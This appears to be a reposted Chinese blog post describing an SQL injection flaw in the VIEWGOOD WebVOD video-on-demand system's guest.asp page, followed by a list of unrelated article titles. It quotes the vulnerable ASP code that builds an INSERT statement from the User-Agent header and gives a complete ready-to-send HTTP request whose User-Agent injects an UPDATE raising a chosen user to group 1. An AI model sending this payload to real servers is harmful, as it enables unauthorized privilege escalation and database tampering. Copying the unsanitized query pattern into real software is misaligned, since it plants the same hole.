远古视频点播系统的一个注入漏洞
来源:互联网 发布:淘宝仓库流程 编辑:程序博客网 时间:2024/06/09 19:06
VIEWGOOD VOD视频点播系统 (WebVOD)
漏洞产生于文件/webmedia/oemui/user/guest.asp,访问这个页面需要注册
相关代码:
szAgent = Request.ServerVariables("HTTP_USER_AGENT") aTmpInfo = Split(szAgent, " (", -1, 1) aAgentInfo = Split(aTmpInfo(1), "; ", -1, 1) szBrowser = aAgentInfo(1) if Right(aAgentInfo(2), 1) = ")" or Right(aAgentInfo(2), 1) = ";" then szOS = Left(aAgentInfo(2), Len(aAgentInfo(2)) - 1) else szOS = aAgentInfo(2) end if szClientIP = Request.ServerVariables("REMOTE_ADDR") szSQL = "INSERT INTO GuestBook(CusTomer_ID,cont,ipaddr,ostype,browser,crdt) VALUES(" & iUserID & ",'" & szMemo & "','" & szClientIP & "','" & szOS & "','" & szBrowser & "','" & now &"')" con.Execute szSQL
HTTP_USER_AGENT我们可以自己构造
POST /webmedia/oemui/user/guest.asp HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg,Referer: http://you.are.fucked.cn/webmedia/oemui/user/guest.aspAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0','');update Customer_Group set Group_ID=1 where Customer_ID=9--; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: you.are.fucked.cnContent-Length: 75Connection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDCSACDTQQ=CGGFJOGANCPNAIAIABABHMHA;memo=aaaa&submit=%B7%A2%CB%CD%D3%C3%BB%A7%C1%F4%D1%D4%D0%C5%CF%A2+%3E%3E%3E
- 远古视频点播系统的一个注入漏洞
- 解决远古VOD注入漏洞
- 做一个完整的P2P视频点播系统
- 做一个完整的P2P视频点播系统
- 如何实现一个c/s模式的flv视频点播系统
- 如何实现一个c/s模式的flv视频点播系统
- 一个典型的sql注入漏洞
- 简单的VOD视频点播系统
- 视频点播系统
- 视频点播系统
- 基于Ajax的视频点播互动系统
- 一段商讨网络视频点播系统的聊天记录
- 金梅电影系统的注入漏洞利用程序
- 远古网络电视台系统
- Coda一个远古时期优秀的高可用分布式文件系统
- 一个生活在远古时代的内心告白
- Sql注入漏洞的例子
- SQL注入漏洞的判断
- 看起来像它——图像搜索其实也不难
- C++/C宏定义中##与#的含义
- C#中messagebox用法
- 主机 ping 不通虚拟机,虚拟机可以ping通主机。解决方案。(ssh连接、linux、vmware)
- select()函数分析(linux)
- 远古视频点播系统的一个注入漏洞
- linux下执行带中文的sql文件,中文内容为空解决办法
- RedGate SQL Prompt 5.3.4.1 Format SQL功能无法使用解决办法
- eclipse中打开个别jsp文件发生Error opening the editor.错误
- 敏捷45记
- PMP考试的过与不过
- c/c++中extern "C"
- 汇编语言的Hello world程序
- Linux进程模型总结